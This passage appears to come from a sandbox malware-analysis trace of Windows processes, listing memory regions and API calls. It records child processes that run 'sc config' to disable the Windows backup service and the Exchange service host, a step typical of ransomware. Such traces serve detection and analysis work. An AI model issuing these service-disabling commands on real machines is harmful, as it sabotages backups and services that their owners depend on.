"\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8687 start_va = 0x7ffc015f0000 end_va = 0x7ffc01625fff entry_point = 0x7ffc015f0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8688 start_va = 0x7ffc018a0000 end_va = 0x7ffc01b1bfff entry_point = 0x7ffc018a0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 8689 start_va = 0x7ffc01dd0000 end_va = 0x7ffc01ef5fff entry_point = 0x7ffc01dd0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8690 start_va = 0x7ffc01f00000 end_va = 0x7ffc0204dfff entry_point = 0x7ffc01f00000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8691 start_va = 0x7ffc02060000 end_va = 0x7ffc020fcfff entry_point = 0x7ffc02060000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8692 start_va = 0x7ffc02100000 end_va = 0x7ffc0215afff entry_point = 0x7ffc02100000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8693 start_va = 0x7ffc02160000 end_va = 0x7ffc022bbfff entry_point = 0x7ffc02160000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8694 start_va = 0x7ffc037f0000 end_va = 0x7ffc03974fff entry_point = 0x7ffc037f0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8695 start_va = 0x7ffc03bb0000 end_va = 0x7ffc03cf0fff entry_point = 0x7ffc03bb0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 8696 start_va = 0x7ffc03d00000 end_va = 0x7ffc03dbdfff entry_point = 0x7ffc03d00000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 8697 start_va = 0x7ffc03dc0000 end_va = 0x7ffc03e6cfff entry_point = 0x7ffc03dc0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Thread: id = 538 os_tid = 0xcbc Thread: id = 539 os_tid = 0x594 Thread: id = 540 os_tid = 0xc74 Process: id = "166" image_name = "sc.exe" filename = "c:\\windows\\syswow64\\sc.exe" page_root = "0x3eaeb000" os_pid = "0x114" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "164" os_parent_pid = "0xc7c" cmd_line = "sc config wsbexchange start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8711 start_va = 0x60000 end_va = 0x7ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 8712 start_va = 0x80000 end_va = 0x81fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 8713 start_va = 0x90000 end_va = 0xa3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000090000" filename = "" Region: id = 8714 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 8715 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8716 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 8717 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 8718 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 8719 start_va = 0xe80000 end_va = 0xe91fff entry_point = 0xe80000 region_type = mapped_file name = "sc.exe" filename = "\\Windows\\SysWOW64\\sc.exe" (normalized: "c:\\windows\\syswow64\\sc.exe") Region: id = 8720 start_va = 0xea0000 end_va = 0x4e9ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 8721 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8722 start_va = 0x7e790000 end_va = 0x7e7b2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e790000" filename = "" Region: id = 8723 start_va = 0x7e7b4000 end_va = 0x7e7b4fff entry_point = 0x0 region_type = private name = "private_0x000000007e7b4000" filename = "" Region: id = 8724 start_va = 0x7e7b9000 end_va = 0x7e7b9fff entry_point = 0x0 region_type = private name = "private_0x000000007e7b9000" filename = "" Region: id = 8725 start_va = 0x7e7bd000 end_va = 0x7e7bffff entry_point = 0x0 region_type = private name = "private_0x000000007e7bd000" filename = "" Region: id = 8726 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8727 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8728 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8729 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8730 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8731 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8732 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8733 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8734 start_va = 0x300000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 8735 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8736 start_va = 0x60000 end_va = 0x6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 8737 start_va = 0x70000 end_va = 0x73fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 8738 start_va = 0x160000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 8739 start_va = 0x1a0000 end_va = 0x1dffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 8740 start_va = 0x200000 end_va = 0x2bdfff entry_point = 0x200000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8741 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000450000" filename = "" Region: id = 8742 start_va = 0x74ce0000 end_va = 0x74d38fff entry_point = 0x74ce0000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 8743 start_va = 0x74d40000 end_va = 0x74d49fff entry_point = 0x74d40000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 8744 start_va = 0x74d50000 end_va = 0x74d6dfff entry_point = 0x74d50000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 8745 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8746 start_va = 0x77250000 end_va = 0x77292fff entry_point = 0x77250000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 8747 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8748 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8749 start_va = 0x77af0000 end_va = 0x77b9bfff entry_point = 0x77af0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 8750 start_va = 0x7e690000 end_va = 0x7e78ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e690000" filename = "" Region: id = 8751 start_va = 0x7e7ba000 end_va = 0x7e7bcfff entry_point = 0x0 region_type = private name = "private_0x000000007e7ba000" filename = "" Region: id = 8752 start_va = 0x460000 end_va = 0x53efff entry_point = 0x460000 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 8753 start_va = 0x2c0000 end_va = 0x2d1fff entry_point = 0x2c0000 region_type = mapped_file name = "sc.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\sc.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\sc.exe.mui") Thread: id = 542 os_tid = 0xcc0 [0133.277] GetModuleHandleA (lpModuleName=0x0) returned 0xe80000 [0133.277] __set_app_type (_Type=0x1) [0133.277] __p__fmode () returned 0x77ac4d6c [0133.277] __p__commode () returned 0x77ac5b1c [0133.277] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe85e00) returned 0x0 [0133.277] __wgetmainargs (in: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030, _DoWildCard=0, _StartInfo=0xe8d03c | out: _Argc=0xe8d028, _Argv=0xe8d02c, _Env=0xe8d030) returned 0 [0133.277] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.280] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.280] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0133.280] wcsncmp (_String1="co", _String2="\\\\", _MaxCount=0x2) returned 7 [0133.280] _wcsicmp (_String1="config", _String2="query") returned -14 [0133.280] _wcsicmp (_String1="config", _String2="queryex") returned -14 [0133.280] _wcsicmp (_String1="config", _String2="start") returned -16 [0133.280] _wcsicmp (_String1="config", _String2="pause") returned -13 [0133.280] _wcsicmp (_String1="config", _String2="interrogate") returned -6 [0133.280] _wcsicmp (_String1="config", _String2="control") returned -14 [0133.280] _wcsicmp (_String1="config", _String2="continue") returned -14 [0133.280] _wcsicmp (_String1="config", _String2="stop") returned -16 [0133.280] _wcsicmp (_String1="config", _String2="config") returned 0 [0133.280] ResolveDelayLoadedAPI () returned 0x77262c10 [0133.280] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x1) returned 0x308530 [0133.282] _wcsicmp (_String1="start=", _String2="type=") returned -1 [0133.282] _wcsicmp (_String1="start=", _String2="start=") returned 0 [0133.282] _wcsicmp (_String1="disabled", _String2="boot") returned 2 [0133.282] _wcsicmp (_String1="disabled", _String2="system") returned -15 [0133.282] _wcsicmp (_String1="disabled", _String2="auto") returned 3 [0133.282] _wcsicmp (_String1="disabled", _String2="demand") returned 4 [0133.282] _wcsicmp (_String1="disabled", _String2="disabled") returned 0 [0133.282] OpenServiceW (hSCManager=0x308530, lpServiceName="wsbexchange", dwDesiredAccess=0x3) returned 0x0 [0133.283] GetLastError () returned 0x424 [0133.283] _ultow (in: _Dest=0x424, _Radix=1242988 | out: _Dest=0x424) returned="1060" [0133.283] FormatMessageW (in: dwFlags=0x1200, lpSource=0x0, dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0xe8d3a0, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0133.284] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x12f748, nSize=0x2, Arguments=0x12f760 | out: lpBuffer="裀0\x12蔔è") returned 0x62 [0133.284] GetFileType (hFile=0x3c) returned 0x2 [0133.284] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x12f72c | out: lpMode=0x12f72c) returned 1 [0133.285] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x3088c0*, nNumberOfCharsToWrite=0x62, lpNumberOfCharsWritten=0x12f73c, lpReserved=0x0 | out: lpBuffer=0x3088c0*, lpNumberOfCharsWritten=0x12f73c*=0x62) returned 1 [0133.285] LocalFree (hMem=0x3088c0) returned 0x0 [0133.285] LocalFree (hMem=0x0) returned 0x0 [0133.285] CloseServiceHandle (hSCObject=0x308530) returned 1 [0133.285] LocalFree (hMem=0x0) returned 0x0 [0133.285] exit (_Code=1060) Thread: id = 543 os_tid = 0xd1c Process: id = "167" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x1cb08000" os_pid = "0xcd0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c sc config MSExchangeServiceHost start= disabled" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8754 start_va = 0x1f0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 8755 start_va = 0x210000 end_va = 0x211fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8756 start_va = 0x220000 end_va = 0x233fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 8757 start_va = 0x240000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000240000" filename = "" Region: id = 8758 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 8759 start_va = 0x380000 end_va = 0x383fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000380000" filename = "" Region: id = 8760 start_va = 0x390000 end_va = 0x390fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000390000" filename = "" Region: id = 8761 start_va = 0x3a0000 end_va = 0x3a1fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 8762 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 8763 start_va = 0x410000 end_va = 0x440ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000410000" filename = "" Region: id = 8764 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 8765 start_va = 0x7fe40000 end_va = 0x7fe62fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fe40000" filename = "" Region: id = 8766 start_va = 0x7fe65000 end_va = 0x7fe65fff entry_point = 0x0 region_type = private name = "private_0x000000007fe65000" filename = "" Region: id = 8767 start_va = 0x7fe67000 end_va = 0x7fe67fff entry_point = 0x0 region_type = private name = "private_0x000000007fe67000" filename = "" Region: id = 8768 start_va = 0x7fe6d000 end_va = 0x7fe6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fe6d000" filename = "" Region: id = 8769 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8770 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 8771 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 8772 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8773 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 8774 start_va = 0x45b0000 end_va = 0x45bffff entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 8775 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 8776 start_va = 0x59360000 end_va = 0x593d2fff entry_point = 0x59360000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 8777 start_va = 0x4410000 end_va = 0x450ffff entry_point = 0x0 region_type = private name = "private_0x0000000004410000" filename = "" Region: id = 8778 start_va = 0x59350000 end_va = 0x59357fff entry_point = 0x59350000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 8819 start_va = 0x1f0000 end_va = 0x1fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 8820 start_va = 0x4510000 end_va = 0x454ffff entry_point = 0x0 region_type = private name = "private_0x0000000004510000" filename = "" Region: id = 8821 start_va = 0x45c0000 end_va = 0x467dfff entry_point = 0x45c0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8822 start_va = 0x4680000 end_va = 0x477ffff entry_point = 0x0 region_type = private name = "private_0x0000000004680000" filename = "" Region: id = 8823 start_va = 0x48e0000 end_va = 0x48effff entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 8824 start_va = 0x76970000 end_va = 0x76ae5fff entry_point = 0x76970000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 8825 start_va = 0x77670000 end_va = 0x7775ffff entry_point = 0x77670000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 8826 start_va = 0x77a10000 end_va = 0x77acdfff entry_point = 0x77a10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 8827 start_va = 0x7fd40000 end_va = 0x7fe3ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007fd40000" filename = "" Region: id = 8828 start_va = 0x7fe6a000 end_va = 0x7fe6cfff entry_point = 0x0 region_type = private name = "private_0x000000007fe6a000" filename = "" Region: id = 8829 start_va = 0x200000 end_va = 0x203fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 8830 start_va = 0x210000 end_va = 0x213fff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 8831 start_va = 0x48f0000 end_va = 0x4c26fff entry_point = 0x48f0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 544 os_tid = 0xcb8 [0133.481] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0133.481] __set_app_type (_Type=0x1) [0133.481] __p__fmode () returned 0x77ac4d6c [0133.481] __p__commode () returned 0x77ac5b1c [0133.481] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0133.481] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0133.481] GetCurrentThreadId () returned 0xcb8 [0133.481] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcb8) returned 0x84 [0133.482] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0133.482] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0133.482] SetThreadUILanguage (LangId=0x0) returned 0x409 [0133.484] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0133.484] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x37faa0 | out: phkResult=0x37faa0*=0x0) returned 0x2 [0133.484] VirtualQuery (in: lpAddress=0x37faa7, lpBuffer=0x37fa58, dwLength=0x1c | out: lpBuffer=0x37fa58*(BaseAddress=0x37f000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.484] VirtualQuery (in: lpAddress=0x280000, lpBuffer=0x37fa58, dwLength=0x1c | out: lpBuffer=0x37fa58*(BaseAddress=0x280000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0133.484] VirtualQuery (in: lpAddress=0x281000, lpBuffer=0x37fa58, dwLength=0x1c | out: lpBuffer=0x37fa58*(BaseAddress=0x281000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0133.484] VirtualQuery (in: lpAddress=0x283000, lpBuffer=0x37fa58, dwLength=0x1c | out: lpBuffer=0x37fa58*(BaseAddress=0x283000, AllocationBase=0x280000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0133.484] VirtualQuery (in: lpAddress=0x380000, lpBuffer=0x37fa58, dwLength=0x1c | out: lpBuffer=0x37fa58*(BaseAddress=0x380000, AllocationBase=0x380000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0133.484] GetConsoleOutputCP () returned 0x1b5 [0133.484] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0133.484] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0133.485] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.485] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0133.485] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.485] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0133.485] _get_osfhandle (_FileHandle=1) returned 0x3c [0133.485] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0133.485] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.485] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0133.485] _get_osfhandle (_FileHandle=0) returned 0x38 [0133.485] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0133.485] GetEnvironmentStringsW () returned 0x4417db0* [0133.486] FreeEnvironmentStringsA (penv="A") returned 1 [0133.486] GetEnvironmentStringsW () returned 0x4417db0* [0133.486] FreeEnvironmentStringsA (penv="A") returned 1 [0133.486] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37ea04 | out: phkResult=0x37ea04*=0x94) returned 0x0 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x0, lpData=0x37ea10*=0x0, lpcbData=0x37ea0c*=0x1000) returned 0x2 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x4, lpData=0x37ea10*=0x1, lpcbData=0x37ea0c*=0x4) returned 0x0 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x0, lpData=0x37ea10*=0x1, lpcbData=0x37ea0c*=0x1000) returned 0x2 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x4, lpData=0x37ea10*=0x0, lpcbData=0x37ea0c*=0x4) returned 0x0 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x4, lpData=0x37ea10*=0x40, lpcbData=0x37ea0c*=0x4) returned 0x0 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x4, lpData=0x37ea10*=0x40, lpcbData=0x37ea0c*=0x4) returned 0x0 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: lpType=0x37ea08*=0x0, lpData=0x37ea10*=0x40, lpcbData=0x37ea0c*=0x1000) returned 0x2 [0133.486] RegCloseKey (hKey=0x94) returned 0x0 [0133.486] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x37ea04 | out: phkResult=0x37ea04*=0x94) returned 0x0 [0133.486] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x37ea08, lpData=0x37ea10, lpcbData=0x37ea0c*=0x1000 | out: 